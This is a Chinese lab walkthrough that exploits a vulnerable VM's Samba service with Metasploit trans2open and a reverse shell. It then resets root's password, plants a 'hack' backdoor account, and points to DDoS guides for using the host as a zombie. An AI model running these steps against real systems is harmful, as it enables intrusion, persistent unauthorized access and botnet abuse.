基于Metasploit完成Samba服务漏洞复现

实验环境:

靶机ip:192.168.31.182(下载链接: https://pan.baidu.com/s/1ia-DD8UPDhIkWUd2eJWoKg?pwd=cykq 提取码: cykq 复制这段内容后打开百度网盘手机App,操作更方便哦)

攻击机ip:192.168.31.166(X64)

一:主机发现

arp-scan -l      #扫描同一网段下的主机

可以看到靶机的IP地址和mac地址,Vmware为虚拟机 

2.漏洞扫描

nmap  192.168.31.182  -p- -sV -sS -T4 -A         #扫描开放的端口和服务                                          

 可以看到存在samba服务漏洞

 靶机的操作系统为linux 2.4.X,属于较低版本

 确定Samba服务的版本号

msfconsole  
search smb_version
use auxiliary/scanner/smb/smb_version 
show options
set rhosts 192.168.31.182
run

 3.漏洞利用

search samba 2.2
exploit/linux/samba/trans2open       #   或者use2
show options 
set rhosts 192.168.31.182
set payload linux/x86/shell_reverse_tcp
set lport 5555       #更换端口号,如果默认4444端口号会报错出先下图错误,建议更换端口号为5555即可成功执行
run



 注意:如果出下面这种情况,更换本地监听主机的端口号

[-] Handler failed to bind to 192.168.31.166:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[-] 192.168.31.182:139 - Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).

 4.攻击成功

id
cat /etc/passwd

出现下面的截图说明靶机攻击成功,接下来就是植入后门账号

可以看到 拿到的是root权限,但是这个shell中的有些命令受限制,我们在把集中增加一个新的后门账户,进行长久控制靶机,使之成为肉鸡

passwd root     #修改root账号的密码,进行ssh登录
123456
123456          #重复输入两次密码

 

5.远程连接靶机

1.问题复现

使用具有最高权限的root账号进行ssh远程连接靶机,正常情况输入两次密码即可正常连接,但是报错

ssh root@192.168.31.182                                                  255 ⨯

ssh root@192.168.31.182                                                  255 ⨯
Unable to negotiate with 192.168.31.182 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1

无法与192.168.31.182协商端口22:没有找到匹配的密钥交换方法。 他们的提议:diffie-hellman-group-exchange-sha1 diffie-hellman-group1-sha1  

2.报错截图

3.问题解决

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss -oCiphers=+3des-cbc root@192.168.31.182

root为登录的用户名,192,。168.31.182为靶机ip地址

成功登录靶机

 6.在靶机中增加账号

useradd hack
passwd 
123456
123456

 

cat /etc/passwd

 可以看到新的后门账号添加成功,接下来用后门账号远程ssh连接靶机

 ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss -oCiphers=+3des-cbc hack@192.168.31.182       #用hack账号登录靶机

 7.利用肉鸡执行ddos攻击

附大佬博客

如何在Kali Linux上发动DDOS攻击 - 云+社区 - 腾讯云 (tencent.com)icon-default.png?t=M276https://cloud.tencent.com/developer/article/1199800

(63条消息) 利用kali进行DOS/DDOS攻击(局域网内)(DHCP原理 ARP原理)_Firebasky的博客-CSDN博客_kali攻击路由器瘫痪icon-default.png?t=M276https://blog.csdn.net/qq_46091464/article/details/105857350


 

  • 2
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

林小陌啊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值